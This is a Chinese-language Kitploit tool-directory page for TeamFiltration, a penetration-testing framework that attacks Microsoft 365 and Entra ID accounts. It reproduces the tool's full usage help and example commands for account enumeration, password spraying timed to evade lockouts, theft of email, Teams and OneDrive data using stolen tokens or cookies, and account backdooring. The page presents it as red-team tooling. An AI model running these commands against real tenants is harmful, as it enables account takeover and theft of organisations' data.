Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
TeamFiltration — 跨平台框架,用于枚举O365账户、密码喷洒、泄露电子邮件/Teams/OneDrive数据,以及通过令牌操纵后门访问EntraID账户。 | Kitploit
工具/GitHubGitHub/flangvik/teamfiltration
OSINT (开源情报)密码攻击数据泄露渗透测试云安全身份验证
GitHubflangvik/teamfiltration

TeamFiltration

跨平台框架,用于枚举O365账户、密码喷洒、泄露电子邮件/Teams/OneDrive数据,以及通过令牌操纵后门访问EntraID账户。

查看仓库
1.4k15125个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

TeamFiltration

TeamFiltration

TeamFiltration 是一个跨平台框架,用于枚举、喷射、窃取和植入后门的 O365 EntraID 账户。 请参阅 TeamFiltration 维基页面了解 TeamFiltration 的工作原理,以及快速入门指南学习如何快速上手!

该工具自 2021 年 1 月起在 TrustedSec 内部使用,并在 DefCON30 期间我的演讲 Taking a Dump In The Cloud 中公开发布。

下载

您可以下载适用于 Linux、Windows 和 MacOS 的最新预编译版本

这些版本预编译为单个应用程序依赖的二进制文件。体积会增加,但您无需 .NET 或任何其他依赖即可运行它们。

分支更改

AWS Fireprox 功能已从喷射和枚举模块中移除。取而代之的是,该工具可以将所有流量路由到您在配置文件中定义的代理。该代理会自动用于喷射和枚举。如果您想将代理用于窃取,必须启用 --debug 标志。

使用方法

root@kitploit:~

  ╔╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╗
 ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤                              ╠╬╬╝╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╣                              │      ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╣                              ││      ╚╬╬╝╚ └╚╝╬╬╬╬╬╬
╬╬╬╬╣         ╔╦╦╬╬╬╬╬╬╦╦╗         ││       │        ╬╬╬╬╬
╬╬╬╬╣     ╔╬╬╬╝╝┘      ╚╝╝╬╬╬┐     ││       ││       └╬╬╬╬
╬╬╬╬┤    ╬╬╝╚╩╬╗╔          ╚╬╬╬    ││       ││        ╬╬╬╬
╬╬╬╬┤   ╬╝      ╚╬╬╗╗ ╔      ╚╬╗   ││      ├││        ╬╬╬╬
╬╬╬╬┤  ╬╬     ╔╗   ╚╬╬╬╬╬╬╦    ╬╬  │┌    ╔╬┤││       ╔╬╬╬╬
╬╬╬╬┤ ╔╬┤     ╬╬╬   ╬╬╬╬╬╬╬╬╝╝╝╬╬╗ ╠╬╬╬╬╬╬╬╬╬╗      ┌╬╬╬╬╬
╬╬╬╬┤ ╬╬┤     ╚╩┘   ╚╬╬╬╬╬╩    ╠╬╬ ╚╝╝╝╝╝╝╝╝╝╬╬╗╗╗╦╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬┤                      ╠╬╬ ││         ╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤  ╬╬   ╦╗            ╗╗   ╬╬  ││         │       ╬╬╬╬
╬╬╬╬┤  └╬┐   ╚╬╗╗      ╔╬╬╝   ╔╬┘  ││         │       ╬╬╬╬
╬╬╬╬┤   └╬╗    ╚╩╩╬╬╬╩╩╝╝   ╔╬╬    ││         │       ╬╬╬╬
╬╬╬╬┤    ╚╬╬╬╗           ┌╗╬╬╝┘    ││         │       ╬╬╬╬
╬╬╬╬┤       ╚╩╬╬╬╦╦╦╦╦╦╬╬╬╝╝       ││         │       ╬╬╬╬
╬╬╬╬┤            ╚╚╝╝╝╝            ││         │       ╬╬╬╬
╬╬╬╬┤                              ││         │    ╔╗╬╬╬╬╬
╬╬╬╬┤                              ││         ╬╦╦╬╬╬╬╬╬╬╬╬
╬╬╬╬┤                              ││     ╔╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤                              ╬╬╬╗╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
 └╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╝
   ╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝

[❤] TeamFiltration V3.5.5 PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed 
使用方法:

   --outpath     存储数据库和窃取信息的输出路径(所有模块都需要)

   --config      TeamFiltration.json 配置文件的本地路径,如果未提供,则从当前路径加载

   --exfil      加载窃取模块

         --username            覆盖以针对数据库中不存在的给定用户名进行操作
         --password            覆盖以针对数据库中不存在的给定密码进行操作
         --tokens              覆盖以针对(以换行符分隔的JWT令牌文件|单个JWT|逗号分隔的JWT令牌)并执行窃取
         --cookie-dump         覆盖以针对使用其刷新cookie集合的给定账户进行操作

         --all                 窃取所有SSO资源(Graph、OWA、SharePoint、OneDrive、Teams)的信息
         --aad                 窃取Graph API的信息(域用户和组)
         --teams               窃取Teams API的信息(文件、聊天记录、附件、联系人列表)
         --teams-db            从窃取的Teams数据库中窃取cookie和认证令牌
         --onedrive            窃取OneDrive/SharePoint API的信息(可访问的SharePoint文件和用户的整个OneDrive目录)
         --owa                 窃取Outlook REST API的信息(最近2000封电子邮件,包括发送和接收)
               --owa-limit          设置要窃取的最大电子邮件数量,默认2000
         --jwt-tokens          转储所有收集到的用于SSO资源的JSON格式JWT令牌(MsGraph、AdGraph、Outlook、SharePoint、OneDrive、Teams)

   --spray      加载喷射模块

         --aad-sso             使用SecureWorks的Azure Active Directory密码暴力破解技术进行喷射
         --us-cloud            在喷射连接到美国租户时使用(https://login.microsoftonline.us/)

         --passwords           密码列表的路径,如果不提供,将生成常见弱密码
         --exclude             要从喷射中排除的电子邮件列表路径
         --seasons-only        生成的喷射密码仅基于季节
         --months-only         生成的喷射密码仅基于月份
         --common-only         使用前20个最常用密码进行喷射
         --shuffle-passwords   在喷射前打乱密码列表
         --shuffle-users       在喷射前打乱目标用户列表
         --shuffle-regions     在喷射时打乱FireProx区域

         --auto-exfil          如果发现有效登录,自动启动窃取模块

         --sleep-min           每次完整喷射轮次之间的最小睡眠分钟数,默认=60
         --sleep-max           每次完整喷射轮次之间的最大睡眠分钟数,默认=100
         --jitter              每次单独认证尝试之间的秒数,默认=0
         --time-window         定义喷射发生的时间窗口,使用军事时间格式 <12:00-19:00>
         --push                当发现有效凭证时通过Pushover发送通知(需要配置中的pushover密钥)
         --push-locked         当被喷射的账户被锁定时通过Pushover发送通知(需要配置中的pushover密钥)
         --force               即使距离上次尝试不到<sleep>时间,也强制进行喷射

   --enum       加载枚举模块

         --domain              要执行枚举的域,如果未提供--usernames,则从statistically-likely-usernames中提取名称
         --usernames           要枚举的用户名列表路径(电子邮件)
         --dehashed            使用dehashed子模块从基础域枚举电子邮件
         --validate-msol       使用公共GetCredentialType方法验证给定的o365账户是否存在(速率限制极严 - 慢速20 e/s)
         --validate-teams      使用Teams API方法验证给定的o365账户是否存在(推荐 - 超快300 e/s)
         --validate-login      通过尝试登录来验证给定的o365账户(有噪音 - 触发登录 - 快速100 e/s)
         --validate-onedrive   使用@nyxgeek的OneDrive方法验证给定的o365账户(推荐 - 快速300 e/s)

   --backdoor       加载交互式后门模块

   --database       加载交互式数据库浏览器模块

   --debug           将所有出站HTTP请求代理到配置中指定的代理

   示例:

        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\FooBar\Exclude_Emails.txt
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --exfil --aad 
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --enum --validate-onedrive --domain example.com
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\FooBar\OSINT\Usernames.txt
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --backdoor
        --outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --database

致谢

  • GitHub - KoenZomers/OneDriveAPI: API in .NET to communicate with OneDrive Personal and OneDrive for Business
  • Research into Undocumented Behavior of Azure AD Refresh Tokens
  • WS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation
  • 感谢 Ryan 验证并讨论我的观察/问题!
  • 整个 TrustedSec 团队帮助我打磨了这个工具!
  • @nyxgeek 发现的 OneDrive 枚举方法及其脚本 onedrive_user_enum
下载工具